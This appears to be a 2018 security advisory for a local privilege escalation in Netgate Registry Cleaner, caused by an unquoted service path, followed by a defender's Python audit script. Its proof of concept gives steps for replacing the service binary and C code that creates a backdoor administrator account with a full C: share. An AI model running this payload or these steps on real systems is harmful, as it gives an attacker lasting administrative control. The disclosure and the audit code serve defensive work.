Netgate Registry Cleaner 18.0.190 - Local Privilege Escalation

ZwX (FR)
Risk: Medium
Local: Yes
Remote: Yes

#--------------------------------------------------------#
#Exploit Title: Netgate Registry Cleaner 18.0.190 - Local Privilege Escalation
#Exploit Author : ZwX
#Exploit Date: 2018-09-09
#Vendor Homepage :
#Tested on OS: Windows 7
#Social:
#contact:
#Website:
#--------------------------------------------------------#

Product & Service Introduction:
===============================
NETGATE Technologies is a security software publisher whose mission is to offer innovative software in the security software market, focusing on the privacy of online users and network security. Whether it's a PC application or a Web application, NETGATE Technologies will only provide you with quality software.

Technical Details & Description:
================================
The application suffers from an unquoted search path issue in the official Netgate Registry Cleaner v18.0.190 anti-virus software, making it a potential vector for a privilege escalation attack. To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.

Proof of Concept (PoC):
=======================
The issue can be exploited by local attackers with a restricted system user account or network access and without user interaction. For security demonstration or to reproduce the vulnerability, follow the information and steps provided below.

Manual steps to reproduce the local vulnerability ...
1. Compile the exe (executable)
2. Rename it to Test.exe
3. Go to the directory of C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe
4. Rename RegistryCleanerSrv.exe to RegistryCleanerSrv1.exe
5. Copy Test.exe to C:\Program Files\NETGATE\Registry Cleaner
6. Rename Test.exe to RegistryCleanerSrv.exe
7. Restart the system
8. Privilege Escalation Success (Created Administrator Account)

-- PoC Exploitation --
SERVICE_NAME: NGRegClnSrv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : NETGATE Registry Cleaner Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

-- Code Exploit C --
#include <windows.h>

int main(void){
    system("net user zwx 123456 /add");
    system("net localgroup Administrators zwx /add");
    system("net share SHARE_NAME=c: /grant:zwx,full");
    return 0;
}

Disclaimer:
===========
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

Copyright © 2018 | ZwX - Security Researcher (Software & web application)
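
A defender's check for the condition described above, as an added example that is not part of the original advisory: it parses the `sc qc` output quoted in the PoC, flags an unquoted image path containing spaces on a LocalSystem service, lists the locations whose write permissions should be reviewed, and produces the quoted value to set instead. The function names are hypothetical, and the sample input is a trimmed copy of the advisory's output.

```python
import re
from pathlib import PureWindowsPath

# Sample input: trimmed copy of the `sc qc` output quoted in the advisory.
SC_QC = r"""
SERVICE_NAME: NGRegClnSrv
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text):
    """Turn the `KEY : value` lines of `sc qc` output into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip():
            fields[key.strip()] = value.strip()
    return fields

def audit(fields):
    """Flag an unquoted image path and list what an administrator should review."""
    raw = fields.get("BINARY_PATH_NAME", "")
    result = {
        "unquoted": False,
        "privileged": fields.get("SERVICE_START_NAME", "").lower() == "localsystem",
        "review_paths": [],
        "fixed": raw,
    }
    if raw.startswith('"'):
        return result  # already quoted: nothing ambiguous to resolve
    # Assumption: the executable ends at the first ".exe"; the rest is arguments.
    m = re.match(r"(.+?\.exe)(\s.*)?$", raw, re.IGNORECASE)
    exe, args = (m.group(1), m.group(2) or "") if m else (raw, "")
    parts = exe.split(" ")
    if len(parts) == 1:
        return result  # no spaces in the path, so quoting does not matter
    # Windows tries each space-delimited prefix as "<prefix>.exe" before the real
    # file, so none of these may be writable by unprivileged users. The install
    # directory is included because the PoC steps replace the binary inside it.
    prefixes = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    result.update(
        unquoted=True,
        review_paths=prefixes + [str(PureWindowsPath(exe).parent)],
        fixed=f'"{exe}"{args}',
    )
    return result

if __name__ == "__main__":
    print(audit(parse_sc_qc(SC_QC)))
```

The `fixed` value is what the service's ImagePath should contain, and every entry in `review_paths` should be writable only by administrators.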

